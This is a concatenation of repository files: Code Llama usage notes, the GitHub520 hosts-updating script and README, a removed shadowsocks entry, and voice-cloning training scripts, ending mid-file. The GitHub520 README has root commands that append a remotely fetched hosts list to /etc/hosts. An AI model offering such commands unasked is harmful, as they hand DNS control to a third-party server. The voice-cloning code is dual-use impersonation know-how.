`CodeLlama-7b` model (`nproc_per_node` needs to be set to the `MP` value): ``` torchrun --nproc_per_node 1 example_completion.py \ --ckpt_dir CodeLlama-7b/ \ --tokenizer_path CodeLlama-7b/tokenizer.model \ --max_seq_len 128 --max_batch_size 4 ``` Pretrained code models are: the Code Llama models `CodeLlama-7b`, `CodeLlama-13b`, `CodeLlama-34b`, `CodeLlama-70b` and the Code Llama - Python models `CodeLlama-7b-Python`, `CodeLlama-13b-Python`, `CodeLlama-34b-Python`, `CodeLlama-70b-Python`. ### Code Infilling Code Llama and Code Llama - Instruct 7B and 13B models are capable of filling in code given the surrounding context. See `example_infilling.py` for some examples. The `CodeLlama-7b` model can be run for infilling with the command below (`nproc_per_node` needs to be set to the `MP` value): ``` torchrun --nproc_per_node 1 example_infilling.py \ --ckpt_dir CodeLlama-7b/ \ --tokenizer_path CodeLlama-7b/tokenizer.model \ --max_seq_len 192 --max_batch_size 4 ``` Pretrained infilling models are: the Code Llama models `CodeLlama-7b` and `CodeLlama-13b` and the Code Llama - Instruct models `CodeLlama-7b-Instruct`, `CodeLlama-13b-Instruct`. ### Fine-tuned Instruction Models Code Llama - Instruct models are fine-tuned to follow instructions. To get the expected features and performance for the 7B, 13B and 34B variants, a specific formatting defined in [`chat_completion()`](https://github.com/facebookresearch/codellama/blob/main/llama/generation.py#L319-L361) needs to be followed, including the `INST` and `<<SYS>>` tags, `BOS` and `EOS` tokens, and the whitespaces and linebreaks in between (we recommend calling `strip()` on inputs to avoid double-spaces). `CodeLlama-70b-Instruct` requires a separate turn-based prompt format defined in [`dialog_prompt_tokens()`](https://github.com/facebookresearch/codellama/blob/main/llama/generation.py#L506-L548). You can use `chat_completion()` directly to generate answers with all instruct models; it will automatically perform the required formatting. You can also deploy additional classifiers for filtering out inputs and outputs that are deemed unsafe. See the llama-recipes repo for [an example](https://github.com/facebookresearch/llama-recipes/blob/main/src/llama_recipes/inference/safety_utils.py) of how to add a safety checker to the inputs and outputs of your inference code. Examples using `CodeLlama-7b-Instruct`: ``` torchrun --nproc_per_node 1 example_instructions.py \ --ckpt_dir CodeLlama-7b-Instruct/ \ --tokenizer_path CodeLlama-7b-Instruct/tokenizer.model \ --max_seq_len 512 --max_batch_size 4 ``` Fine-tuned instruction-following models are: the Code Llama - Instruct models `CodeLlama-7b-Instruct`, `CodeLlama-13b-Instruct`, `CodeLlama-34b-Instruct`, `CodeLlama-70b-Instruct`. Code Llama is a new technology that carries potential risks with use. Testing conducted to date has not — and could not — cover all scenarios. In order to help developers address these risks, we have created the [Responsible Use Guide](https://github.com/facebookresearch/llama/blob/main/Responsible-Use-Guide.pdf). More details can be found in our research papers as well. ## Issues Please report any software “bug”, or other problems with the models through one of the following means: - Reporting issues with the model: [github.com/facebookresearch/codellama](http://github.com/facebookresearch/codellama) - Reporting risky content generated by the model: [developers.facebook.com/llama_output_feedback](http://developers.facebook.com/llama_output_feedback) - Reporting bugs and security concerns: [facebook.com/whitehat/info](http://facebook.com/whitehat/info) ## Model Card See [MODEL_CARD.md](MODEL_CARD.md) for the model card of Code Llama. ## License Our model and weights are licensed for both researchers and commercial entities, upholding the principles of openness. Our mission is to empower individuals, and industry through this opportunity, while fostering an environment of discovery and ethical AI advancements. See the [LICENSE](https://github.com/facebookresearch/llama/blob/main/LICENSE) file, as well as our accompanying [Acceptable Use Policy](https://github.com/facebookresearch/llama/blob/main/USE_POLICY.md) ## References 1. [Code Llama Research Paper](https://ai.meta.com/research/publications/code-llama-open-foundation-models-for-code/) 2. [Code Llama Blog Post](https://ai.meta.com/blog/code-llama-large-language-model-coding/)
GitHub520
586c0d2e2bebb5962c4419edada24a3a416c9e3d
File: fetch_ips.py #!/usr/bin/env python # -*- coding:utf-8 -*- # # Author : XueWeiHan # E-mail : [email protected] # Date : 2020-05-19 15:27 # Desc : 获取最新的 GitHub 相关域名对应 IP import os import re import json from typing import Any, Optional from datetime import datetime, timezone, timedelta from pythonping import ping from requests_html import HTMLSession from retry import retry GITHUB_URLS = [ 'alive.github.com', 'api.github.com', 'assets-cdn.github.com', 'avatars.githubusercontent.com', 'avatars0.githubusercontent.com', 'avatars1.githubusercontent.com', 'avatars2.githubusercontent.com', 'avatars3.githubusercontent.com', 'avatars4.githubusercontent.com', 'avatars5.githubusercontent.com', 'camo.githubusercontent.com', 'central.github.com', 'cloud.githubusercontent.com', 'codeload.github.com', 'collector.github.com', 'desktop.githubusercontent.com', 'favicons.githubusercontent.com', 'gist.github.com', 'github-cloud.s3.amazonaws.com', 'github-com.s3.amazonaws.com', 'github-production-release-asset-2e65be.s3.amazonaws.com', 'github-production-repository-file-5c1aeb.s3.amazonaws.com', 'github-production-user-asset-6210df.s3.amazonaws.com', 'github.blog', 'github.com', 'github.community', 'github.githubassets.com', 'github.global.ssl.fastly.net', 'github.io', 'github.map.fastly.net', 'githubstatus.com', 'live.github.com', 'media.githubusercontent.com', 'objects.githubusercontent.com', 'pipelines.actions.githubusercontent.com', 'raw.githubusercontent.com', 'user-images.githubusercontent.com', 'vscode.dev', 'education.github.com', 'private-user-images.githubusercontent.com' ] HOSTS_TEMPLATE = """# GitHub520 Host Start {content} # Update time: {update_time} # Update url: https://raw.hellogithub.com/hosts # Star me: https://github.com/521xueweihan/GitHub520 # GitHub520 Host End\n""" def write_file(hosts_content: str, update_time: str) -> bool: output_doc_file_path = os.path.join(os.path.dirname(__file__), "README.md") template_path = os.path.join(os.path.dirname(__file__), "README_template.md") write_host_file(hosts_content) if os.path.exists(output_doc_file_path): with open(output_doc_file_path, "r") as old_readme_fb: old_content = old_readme_fb.read() if old_content: old_hosts = old_content.split("```bash")[1].split("```")[0].strip() old_hosts = old_hosts.split("# Update time:")[0].strip() hosts_content_hosts = hosts_content.split("# Update time:")[ 0].strip() if old_hosts == hosts_content_hosts: print("host not change") return False with open(template_path, "r") as temp_fb: template_str = temp_fb.read() hosts_content = template_str.format(hosts_str=hosts_content, update_time=update_time) with open(output_doc_file_path, "w") as output_fb: output_fb.write(hosts_content) return True def write_host_file(hosts_content: str) -> None: output_file_path = os.path.join(os.path.dirname(__file__), 'hosts') with open(output_file_path, "w") as output_fb: output_fb.write(hosts_content) def write_json_file(hosts_list: list) -> None: output_file_path = os.path.join(os.path.dirname(__file__), 'hosts.json') with open(output_file_path, "w") as output_fb: json.dump(hosts_list, output_fb) def get_best_ip(ip_list: list) -> str: ping_timeout = 2 best_ip = '' min_ms = ping_timeout * 1000 for ip in ip_list: ping_result = ping(ip, timeout=ping_timeout) print(ping_result.rtt_avg_ms) if ping_result.rtt_avg_ms == ping_timeout * 1000: # 超时认为 IP 失效 continue else: if ping_result.rtt_avg_ms < min_ms: min_ms = ping_result.rtt_avg_ms best_ip = ip return best_ip @retry(tries=3) def get_json(session: Any) -> Optional[list]: url = 'https://raw.hellogithub.com/hosts.json' try: rs = session.get(url) data = json.loads(rs.text) return data except Exception as ex: print(f"get: {url}, error: {ex}") raise Exception @retry(tries=3) def get_ip(session: Any, github_url: str) -> Optional[str]: url = f'https://sites.ipaddress.com/{github_url}' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)' ' AppleWebKit/537.36 (KHTML, like Gecko) Chrome/1' '06.0.0.0 Safari/537.36'} try: rs = session.get(url, headers=headers, timeout=5) table = rs.html.find('#dns', first=True) pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" ip_list = re.findall(pattern, table.text) best_ip = get_best_ip(ip_list) if best_ip: return best_ip else: raise Exception(f"url: {github_url}, ipaddress empty") except Exception as ex: print(f"get: {url}, error: {ex}") raise Exception def main(verbose=False) -> None: if verbose: print('Start script.') session = HTMLSession() content = "" content_list = get_json(session) for item in content_list: content += item[0].ljust(30) + item[1] + "\n" # content_list = [] # for index, github_url in enumerate(GITHUB_URLS): # try: # ip = get_ip(session, github_url) # content += ip.ljust(30) + github_url + "\n" # content_list.append((ip, github_url,)) # except Exception: # continue # if verbose: # print(f'process url: {index + 1}/{len(GITHUB_URLS)}') if not content: return update_time = datetime.utcnow().astimezone( timezone(timedelta(hours=8))).replace(microsecond=0).isoformat() hosts_content = HOSTS_TEMPLATE.format(content=content, update_time=update_time) has_change = write_file(hosts_content, update_time) if has_change: write_json_file(content_list) if verbose: print(hosts_content) print('End script.') if __name__ == '__main__': main(True)
# GitHub520 <p align="center"> <a href="https://hellogithub.com/repository/d05ff820bf36470581c02cda5cbd17ea" target="_blank"><img src="https://api.hellogithub.com/v1/widgets/recommend.svg?rid=d05ff820bf36470581c02cda5cbd17ea&claim_uid=8MKvZoxaWt" alt="Featured|HelloGitHub" style="width: 250px; height: 54px;" width="250" height="54" /></a><br> 😘 让你“爱”上 GitHub,解决访问时图裂、加载慢的问题。 </p> > 服务器已续费到 2024.12 共花了:1500+💰 [点击扫码赞助](https://raw.hellogithub.com/code.png),感谢🙏 ## 一、介绍 对 GitHub 说"爱"太难了:访问慢、图片加载不出来。 **本项目无需安装任何程序,仅需 5 分钟。** 通过修改本地 hosts 文件,试图解决: - GitHub 访问速度慢的问题 - GitHub 项目中的图片显示不出的问题 让你"爱"上 GitHub。 *注:* 本项目还处于测试阶段,仅在本机测试通过,如有问题欢迎提 [issues](https://github.com/521xueweihan/GitHub520/issues/new) ## 二、使用方法 下面的地址无需访问 GitHub 即可获取到最新的 hosts 内容: - 文件:`https://raw.hellogithub.com/hosts` - JSON:`https://raw.hellogithub.com/hosts.json` ### 2.1 手动方式 #### 2.1.1 复制下面的内容 ```bash # GitHub520 Host Start 140.82.113.25 alive.github.com 140.82.112.5 api.github.com 185.199.109.153 assets-cdn.github.com 185.199.111.133 avatars.githubusercontent.com 185.199.111.133 avatars0.githubusercontent.com 185.199.111.133 avatars1.githubusercontent.com 185.199.108.133 avatars2.githubusercontent.com 185.199.111.133 avatars3.githubusercontent.com 185.199.108.133 avatars4.githubusercontent.com 185.199.111.133 avatars5.githubusercontent.com 185.199.111.133 camo.githubusercontent.com 140.82.114.22 central.github.com 185.199.111.133 cloud.githubusercontent.com 140.82.112.10 codeload.github.com 140.82.113.22 collector.github.com 185.199.108.133 desktop.githubusercontent.com 185.199.111.133 favicons.githubusercontent.com 140.82.114.3 gist.github.com 52.216.210.241 github-cloud.s3.amazonaws.com 52.217.103.188 github-com.s3.amazonaws.com 3.5.30.129 github-production-release-asset-2e65be.s3.amazonaws.com 52.217.82.92 github-production-repository-file-5c1aeb.s3.amazonaws.com 52.217.132.57 github-production-user-asset-6210df.s3.amazonaws.com 192.0.66.2 github.blog 140.82.113.3 github.com 140.82.114.18 github.community 185.199.110.154 github.githubassets.com 151.101.193.194 github.global.ssl.fastly.net 185.199.109.153 github.io 185.199.111.133 github.map.fastly.net 185.199.109.153 githubstatus.com 140.82.112.26 live.github.com 185.199.111.133 media.githubusercontent.com 185.199.111.133 objects.githubusercontent.com 13.107.42.16 pipelines.actions.githubusercontent.com 185.199.108.133 raw.githubusercontent.com 185.199.108.133 user-images.githubusercontent.com 140.82.114.21 education.github.com 185.199.108.133 private-user-images.githubusercontent.com # Update time: 2024-09-12T10:24:14+08:00 # Update url: https://raw.hellogithub.com/hosts # Star me: https://github.com/521xueweihan/GitHub520 # GitHub520 Host End ``` 该内容会自动定时更新, 数据更新时间:2024-09-12T10:24:14+08:00 #### 2.1.2 修改 hosts 文件 hosts 文件在每个系统的位置不一,详情如下: - Windows 系统:`C:\Windows\System32\drivers\etc\hosts` - Linux 系统:`/etc/hosts` - Mac(苹果电脑)系统:`/etc/hosts` - Android(安卓)系统:`/system/etc/hosts` - iPhone(iOS)系统:`/etc/hosts` 修改方法,把第一步的内容复制到文本末尾: 1. Windows 使用记事本。 2. Linux、Mac 使用 Root 权限:`sudo vi /etc/hosts`。 3. iPhone、iPad 须越狱、Android 必须要 root。 #### 2.1.3 激活生效 大部分情况下是直接生效,如未生效可尝试下面的办法,刷新 DNS: 1. Windows:在 CMD 窗口输入:`ipconfig /flushdns` 2. Linux 命令:`sudo nscd restart`,如报错则须安装:`sudo apt install nscd` 或 `sudo /etc/init.d/nscd restart` 3. Mac 命令:`sudo killall -HUP mDNSResponder` **Tips:** 上述方法无效可以尝试重启机器。 ### 2.2 自动方式(SwitchHosts) **Tip**:推荐 [SwitchHosts](https://github.com/oldj/SwitchHosts) 工具管理 hosts 以 SwitchHosts 为例,看一下怎么使用的,配置参考下面: - Hosts 类型: `Remote` - Hosts 标题: 随意 - URL: `https://raw.hellogithub.com/hosts` - 自动刷新: 最好选 `1 小时` 如图: ![](./img/switch-hosts.png) 这样每次 hosts 有更新都能及时进行更新,免去手动更新。 ### 2.3 一行命令 #### Windows 使用命令需要安装[git bash](https://gitforwindows.org/) 复制以下命令保存到本地命名为**fetch_github_hosts** ```shell _hosts=$(mktemp /tmp/hostsXXX) hosts=/c/Windows/System32/drivers/etc/hosts remote=https://raw.hellogithub.com/hosts reg='/# GitHub520 Host Start/,/# Github520 Host End/d' sed "$reg" $hosts > "$_hosts" curl "$remote" >> "$_hosts" cat "$_hosts" > "$hosts" rm "$_hosts" ``` 在**CMD**中执行以下命令,执行前需要替换**git-bash.exe**和**fetch_github_hosts**为你本地的路径,注意前者为windows路径格式后者为shell路径格式 `"C:\Program Files\Git\git-bash.exe" -c "/c/Users/XXX/fetch_github_hosts"` 可以将上述命令添加到windows的task schedular(任务计划程序)中以定时执行 #### GNU(Ubuntu/CentOS/Fedora) `sudo sh -c 'sed -i "/# GitHub520 Host Start/Q" /etc/hosts && curl https://raw.hellogithub.com/hosts >> /etc/hosts'` #### BSD/macOS `sudo sed -i "" "/# GitHub520 Host Start/,/# Github520 Host End/d" /etc/hosts && curl https://raw.hellogithub.com/hosts | sudo tee -a /etc/hosts` 将上面的命令添加到 cron,可定时执行。使用前确保 GitHub520 内容在该文件最后部分。 **在 Docker 中运行,若遇到 `Device or resource busy` 错误,可使用以下命令执行** `cp /etc/hosts ~/hosts.new && sed -i "/# GitHub520 Host Start/Q" ~/hosts.new && curl https://raw.hellogithub.com/hosts >> ~/hosts.new && cp -f ~/hosts.new /etc/hosts` ### 2.4 AdGuard 用户(自动方式) 在 **过滤器>DNS 封锁清单>添加阻止列表>添加一个自定义列表**,配置如下: - 名称:随意 - URL:`https://raw.hellogithub.com/hosts`(和上面 SwitchHosts 使用的一样) 如图: ![](./img/AdGuard-rules.png) 更新间隔在 **设置 > 常规设置 > 过滤器更新间隔(设置一小时一次即可)**,记得勾选上 **使用过滤器和 Hosts 文件以拦截指定域名** ![](./img/AdGuard-rules2.png) **Tip**:不要添加在 **DNS 允许清单** 内,只能添加在 **DNS 封锁清单** 才管用。 另外,AdGuard for Mac、AdGuard for Windows、AdGuard for Android、AdGuard for IOS 等等 **AdGuard 家族软件** 添加方法均类似。 ## 三、效果对比 之前的样子: ![](./img/old.png) 修改完 hosts 的样子: ![](./img/new.png) ## TODO - [x] 定时自动更新 hosts 内容 - [x] hosts 内容无变动不会更新 - [x] 寻到最优 IP 解析结果 ## 声明 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh"><img alt="知识共享许可协议" style="border-width: 0" src="https://licensebuttons.net/l/by-nc-nd/4.0/88x31.png"></a><br>本作品采用 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh">署名-非商业性使用-禁止演绎 4.0 国际</a> 进行许可。
shadowsocks
938bba32a4008bdde9c064dda6a0597987ddef54
Removed according to regulations.
Real-Time-Voice-Cloning
911679d0c27fb57cde8ef2b5967e9ed2dd543e10
File: encoder_preprocess.py from encoder.preprocess import preprocess_librispeech, preprocess_voxceleb1, preprocess_voxceleb2 from utils.argutils import print_args from pathlib import Path import argparse if __name__ == "__main__": class MyFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter): pass parser = argparse.ArgumentParser( description="Preprocesses audio files from datasets, encodes them as mel spectrograms and " "writes them to the disk. This will allow you to train the encoder. The " "datasets required are at least one of VoxCeleb1, VoxCeleb2 and LibriSpeech. " "Ideally, you should have all three. You should extract them as they are " "after having downloaded them and put them in a same directory, e.g.:\n" "-[datasets_root]\n" " -LibriSpeech\n" " -train-other-500\n" " -VoxCeleb1\n" " -wav\n" " -vox1_meta.csv\n" " -VoxCeleb2\n" " -dev", formatter_class=MyFormatter ) parser.add_argument("datasets_root", type=Path, help=\ "Path to the directory containing your LibriSpeech/TTS and VoxCeleb datasets.") parser.add_argument("-o", "--out_dir", type=Path, default=argparse.SUPPRESS, help=\ "Path to the output directory that will contain the mel spectrograms. If left out, " "defaults to <datasets_root>/SV2TTS/encoder/") parser.add_argument("-d", "--datasets", type=str, default="librispeech_other,voxceleb1,voxceleb2", help=\ "Comma-separated list of the name of the datasets you want to preprocess. Only the train " "set of these datasets will be used. Possible names: librispeech_other, voxceleb1, " "voxceleb2.") parser.add_argument("-s", "--skip_existing", action="store_true", help=\ "Whether to skip existing output files with the same name. Useful if this script was " "interrupted.") parser.add_argument("--no_trim", action="store_true", help=\ "Preprocess audio without trimming silences (not recommended).") args = parser.parse_args() # Verify webrtcvad is available if not args.no_trim: try: import webrtcvad except: raise ModuleNotFoundError("Package 'webrtcvad' not found. This package enables " "noise removal and is recommended. Please install and try again. If installation fails, " "use --no_trim to disable this error message.") del args.no_trim # Process the arguments args.datasets = args.datasets.split(",") if not hasattr(args, "out_dir"): args.out_dir = args.datasets_root.joinpath("SV2TTS", "encoder") assert args.datasets_root.exists() args.out_dir.mkdir(exist_ok=True, parents=True) # Preprocess the datasets print_args(args, parser) preprocess_func = { "librispeech_other": preprocess_librispeech, "voxceleb1": preprocess_voxceleb1, "voxceleb2": preprocess_voxceleb2, } args = vars(args) for dataset in args.pop("datasets"): print("Preprocessing %s" % dataset) preprocess_func[dataset](**args) File: encoder_train.py from utils.argutils import print_args from encoder.train import train from pathlib import Path import argparse if __name__ == "__main__": parser = argparse.ArgumentParser( description="Trains the speaker encoder. You must have run encoder_preprocess.py first.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("run_id", type=str, help= \ "Name for this model. By default, training outputs will be stored to saved_models/<run_id>/. If a model state " "from the same run ID was previously saved, the training will restart from there. Pass -f to overwrite saved " "states and restart from scratch.") parser.add_argument("clean_data_root", type=Path, help= \ "Path to the output directory of encoder_preprocess.py. If you left the default " "output directory when preprocessing, it should be <datasets_root>/SV2TTS/encoder/.") parser.add_argument("-m", "--models_dir", type=Path, default="saved_models", help=\ "Path to the root directory that contains all models. A directory <run_name> will be created under this root." "It will contain the saved model weights, as well as backups of those weights and plots generated during " "training.") parser.add_argument("-v", "--vis_every", type=int, default=10, help= \ "Number of steps between updates of the loss and the plots.") parser.add_argument("-u", "--umap_every", type=int, default=100, help= \ "Number of steps between updates of the umap projection. Set to 0 to never update the " "projections.") parser.add_argument("-s", "--save_every", type=int, default=500, help= \ "Number of steps between updates of the model on the disk. Set to 0 to never save the " "model.") parser.add_argument("-b", "--backup_every", type=int, default=7500, help= \ "Number of steps between backups of the model. Set to 0 to never make backups of the " "model.") parser.add_argument("-f", "--force_restart", action="store_true", help= \ "Do not load any saved model.") parser.add_argument("--visdom_server", type=str, default="http://localhost") parser.add_argument("--no_visdom", action="store_true", help= \ "Disable visdom.") args = parser.parse_args() # Run the training print_args(args, parser) train(**vars(args)) File: synthesizer_train.py from pathlib import Path from synthesizer.hparams import hparams from synthesizer.train import train from utils.argutils import print_args import argparse if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("run_id", type=str, help= \ "Name for this model. By default, training outputs will be stored to saved_models/<run_id>/. If a model state " "from the same run ID was previously saved, the training will restart from there. Pass -f to overwrite saved " "states and restart from scratch.") parser.add_argument("syn_dir", type=Path, help= \ "Path to the synthesizer directory that contains the ground truth mel spectrograms, " "the wavs and the embeds.") parser.add_argument("-m", "--models_dir", type=Path, default="saved_models", help=\ "Path to the output directory that will contain the saved model weights and the logs.") parser.add_argument("-s", "--save_every", type=int, default=1000, help= \ "Number of steps between updates of the model on the disk. Set to 0 to never save the " "model.") parser.add_argument("-b", "--backup_every", type=int, default=25000, help= \ "Number of steps between backups of the model. Set to 0 to never make backups of the " "model.") parser.add_argument("-f", "--force_restart", action="store_true", help= \ "Do not load any saved model and restart from scratch.") parser.add_argument("--hparams", default="", help=\ "Hyperparameter overrides as a comma-separated list of name=value pairs") args = parser.parse_args() print_args(args, parser) args.hparams = hparams.parse(args.hparams) # Run the training train(**vars(args)) File: demo_toolbox.py import argparse import os from pathlib import Path from toolbox import Toolbox from utils.argutils import print_args from utils.default_models import ensure_default_models if __name__ == '__main__': parser = argparse.ArgumentParser( description="Runs the toolbox.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("-d", "--datasets_root", type=Path, help= \ "Path to the directory containing your datasets. See toolbox/__init__.py for a list of " "supported datasets.", default=None) parser.add_argument("-m", "--models_dir", type=Path, default="saved_models", help="Directory containing all saved models") parser.add_argument("--cpu", action="store_true", help=\ "If True, all inference will be done on CPU") parser.add_argument("--seed", type=int, default=None, help=\ "Optional random number seed value to make toolbox deterministic.") args = parser.parse_args() arg_dict = vars(args) print_args(args, parser) # Hide GPUs from Pytorch to force CPU processing if arg_dict.pop("cpu"): os.environ["CUDA_VISIBLE_DEVICES"] = "-1" # Remind the user to download pretrained models if needed ensure_default_models(args.models_dir) # Launch the toolbox Toolbox(**arg_dict) File: vocoder_train.py import argparse from pathlib import Path from utils.argutils import print_args from vocoder.train import train if __name__ == "__main__": parser = argparse.ArgumentParser( description="Trains the vocoder from the synthesizer audios and the GTA synthesized mels, " "or ground truth mels.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("run_id", type=str, help= \ "Name for this model. By default, training outputs will be stored to saved_models/<run_id>/. If a model state " "from the same run ID was previously saved, the training will restart from there. Pass -f to overwrite saved " "states and restart from scratch.") parser.add_argument("datasets_root", type=Path, help= \ "Path to the directory containing your SV2TTS directory. Specifying --syn_dir or --voc_dir " "will take priority over this argument.") parser.add_argument("--syn_dir", type=Path, default=argparse.SUPPRESS, help= \ "Path to the synthesizer directory that contains the ground truth mel spectrograms, " "the wavs and the embeds. Defaults to <datasets_root>/SV2TTS/synthesizer/.") parser.add_argument("--voc_dir", type=Path, default=argparse.SUPPRESS, help= \ "Path to the vocoder directory that contains the GTA synthesized mel spectrograms. " "Defaults to <datasets_root>/SV2TTS/vocoder/. Unused if --ground_truth is passed.") parser.add_argument("-m", "--models_dir", type=Path, default="saved_models", help=\ "Path to the directory that will contain the saved model weights, as well as backups " "of those weights and wavs generated during training.") parser.add_argument("-g", "--ground_truth", action="store_true", help= \ "Train on ground truth spectrograms (<datasets_root>/SV2TTS/synthesizer/mels).") parser.add_argument("-s", "--save_every", type=int, default=1000, help= \ "Number of steps between updates of the model on the disk. Set to 0 to never save the " "model.") parser.add_argument("-b", "--backup_every", type=int, default=25000, help= \ "Number of steps between backups of the model. Set to 0 to never make backups of the " "model.") parser.add_argument("-f", "--force_restart", action="store_true", help= \ "Do not load any saved model and restart from scratch.") args = parser.parse_args() # Process the arguments if not hasattr(args, "syn_dir"): args.syn_dir = args.datasets_root / "SV2TTS" / "synthesizer" if not hasattr(args, "voc_dir"): args.voc_dir = args.datasets_root / "SV2TTS" / "vocoder" del args.datasets_root args.models_dir.mkdir(exist_ok=True) # Run the training print_args(args, parser) train(**vars(args)) File: synthesizer_preprocess_embeds.py from synthesizer.preprocess import create_embeddings from utils.argutils import print_args from pathlib import Path import argparse if __name__ == "__main__": parser = argparse.ArgumentParser( description="Creates embeddings for the synthesizer from the LibriSpeech utterances.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("synthesizer_root", type=Path, help=\ "Path to the synthesizer training data that contains the audios and the train.txt file. " "If you let everything as default, it should be <datasets_root>/SV2TTS/synthesizer/.") parser.add_argument("-e", "--encoder_model_fpath", type=Path, default="saved_models/default/encoder.pt", help=\ "Path your trained encoder model.") parser.add_argument("-n", "--n_processes", type=int, default=4, help= \ "Number of parallel processes. An encoder is created for each, so you may need to lower " "this value on GPUs with low memory. Set it to 1 if CUDA is unhappy.") args = parser.parse_args() # Preprocess the dataset print_args(args, parser) create_embeddings(**vars(args)) File: synthesizer_preprocess_audio.py from synthesizer.preprocess import preprocess_dataset from synthesizer.hparams import hparams from utils.argutils import print_args from pathlib import Path import argparse if __name__ == "__main__": parser = argparse.ArgumentParser( description="Preprocesses audio files from datasets, encodes them as mel spectrograms " "and writes them to the disk. Audio files are also saved, to be used by the " "vocoder for training.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("datasets_root", type=Path, help=\ "Path to the directory containing your LibriSpeech/TTS datasets.") parser.add_argument("-o", "--out_dir", type=Path, default=argparse.SUPPRESS, help=\ "Path to the output directory that will contain the mel spectrograms, the audios and the " "embeds. Defaults to <datasets_root>/SV2TTS/synthesizer/") parser.add_argument("-n", "--n_processes", type=int, default=4, help=\ "Number of processes in parallel.") parser.add_argument("-s", "--skip_existing", action="store_true", help=\ "Whether to overwrite existing files with the same name. Useful if the preprocessing was " "interrupted.") parser.add_argument("--hparams", type=str, default="", help=\ "Hyperparameter overrides as a comma-separated list of name-value pairs") parser.add_argument("--no_alignments", action="store_true", help=\ "Use this option when dataset does not include alignments\ (these are used to split long audio files into sub-utterances.)") parser.add_argument("--datasets_name", type=str, default="LibriSpeech", help=\ "Name of the dataset directory to process.") parser.add_argument("--subfolders", type=str, default="train-clean-100,train-clean-360", help=\ "Comma-separated list of subfolders to process inside your dataset directory") args = parser.parse_args() # Process the arguments if not hasattr(args, "out_dir"): args.out_dir = args.datasets_root.joinpath("SV2TTS", "synthesizer") # Create directories assert args.datasets_root.exists() args.out_dir.mkdir(exist_ok=True, parents=True) # Preprocess the dataset print_args(args, parser) args.hparams = hparams.parse(args.hparams) preprocess_dataset(**vars(args)) File: vocoder_preprocess.py import argparse import os from pathlib import Path from synthesizer.hparams import hparams from synthesizer.synthesize import run_synthesis from utils.argutils import print_args if __name__ == "__main__": class MyFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter): pass parser = argparse.ArgumentParser( description="Creates ground-truth aligned (GTA) spectrograms from the vocoder.", formatter_class=MyFormatter ) parser.add_argument("datasets_root", type=Path, help=\ "Path to the directory containing your SV2TTS directory. If you specify both --in_dir and " "--out_dir, this argument won't be used.") parser.add_argument("-s", "--syn_model_fpath", type=Path, default="saved_models/default/synthesizer.pt", help="Path to a saved synthesizer") parser.add_argument("-i", "--in_dir", type=Path, default=argparse.SUPPRESS, help= \ "Path to the synthesizer directory that contains the mel spectrograms, the wavs and the " "embeds. Defaults to <datasets_root>/SV2TTS/synthesizer/.") parser.add_argument("-o", "--out_dir", type=Path, default=argparse.SUPPRESS, help= \ "Path to the output vocoder directory that will contain the ground truth aligned mel " "spectrograms. Defaults to <datasets_root>/SV2TTS/vocoder/.") parser.add_argument("--hparams", default="", help=\ "Hyperparameter overrides as a comma-separated list of name=value pairs") parser.add_argument("--cpu", action="store_true", help=\ "If True, processing is done on CPU, even when a GPU is available.") args = parser.parse_args() print_args(args, parser) modified_hp = hparams.parse(args.hparams) if not hasattr(args, "in_dir"): args.in_dir = args.datasets_root / "SV2TTS" / "synthesizer" if not hasattr(args, "out_dir"): args.out_dir = args.datasets_root / "SV2TTS" / "vocoder" if args.cpu: # Hide GPUs from Pytorch to force CPU processing os.environ["CUDA_VISIBLE_DEVICES"] = "-1" run_synthesis(args.in_dir, args.out_dir, args.syn_model_fpath, modified_hp) File: demo_cli.py import argparse import os from pathlib import Path import librosa import numpy as np import soundfile as sf import torch from encoder import inference as encoder from encoder.params_model import model_embedding_size as speaker_embedding_size from synthesizer.inference import Synthesizer from utils.argutils import print_args from utils.default_models import ensure_default_models from vocoder import inference as vocoder if __name__ == '__main__': parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("-e", "--enc_model_fpath", type=Path, default="saved_models/default/encoder.pt", help="Path to a saved encoder") parser.add_argument("-s", "--syn_model_fpath", type=Path, default="saved_models/default/synthesizer.pt", help="Path to a saved synthesizer") parser.add_argument("-v", "--voc_model_fpath", type=Path, default="saved_models/default/vocoder.pt", help="Path to a saved vocoder") parser.add_argument("--cpu", action="store_true", help=\ "If True, processing is done on CPU, even when a GPU is available.") parser.add_argument("--no_sound", action="store_true", help=\ "If True, audio won't be played.") parser.add_argument("--seed", type=int, default=None, help=\ "Optional random number seed value to make toolbox deterministic.") args = parser.parse_args() arg_dict = vars(args) print_args(args, parser) # Hide GPUs from Pytorch to force CPU processing if arg_dict.pop("cpu"): os.environ["CUDA_VISIBLE_DEVICES"] = "-1" print("Running a test of your configuration...\n") if torch.cuda.is_available(): device_id = torch.cuda.current_device() gpu_properties = torch.cuda.get_device_properties(device_id) ## Print some environment information (for debugging purposes) print("Found %d GPUs available. Using GPU %d (%s) of compute capability %d.%d with " "%.1fGb total memory.\n" % (torch.cuda.device_count(), device_id, gpu_properties.name, gpu_properties.major, gpu_properties.minor, gpu_properties.total_memory / 1e9)) else: print("Using CPU for inference.\n") ## Load the models one by one. print("Preparing the encoder, the synthesizer and the vocoder...") ensure_default_models(Path("saved_models")) encoder.load_model(args.enc_model_fpath) synthesizer = Synthesizer(args.syn_model_fpath) vocoder.load_model(args.voc_model_fpath) ## Run a test print("Testing your configuration with small inputs.") # Forward an audio waveform of zeroes that lasts 1 second. Notice how we can get the encoder's # sampling rate, which may differ. # If you're unfamiliar with digital audio, know that it is encoded as an array of floats # (or sometimes integers, but mostly floats in this projects) ranging from -1 to 1. # The sampling rate is the number of values (samples) recorded per second, it is set to # 16000 for the encoder. Creating an array of length <sampling_rate> will always correspond # to an audio of 1 second. 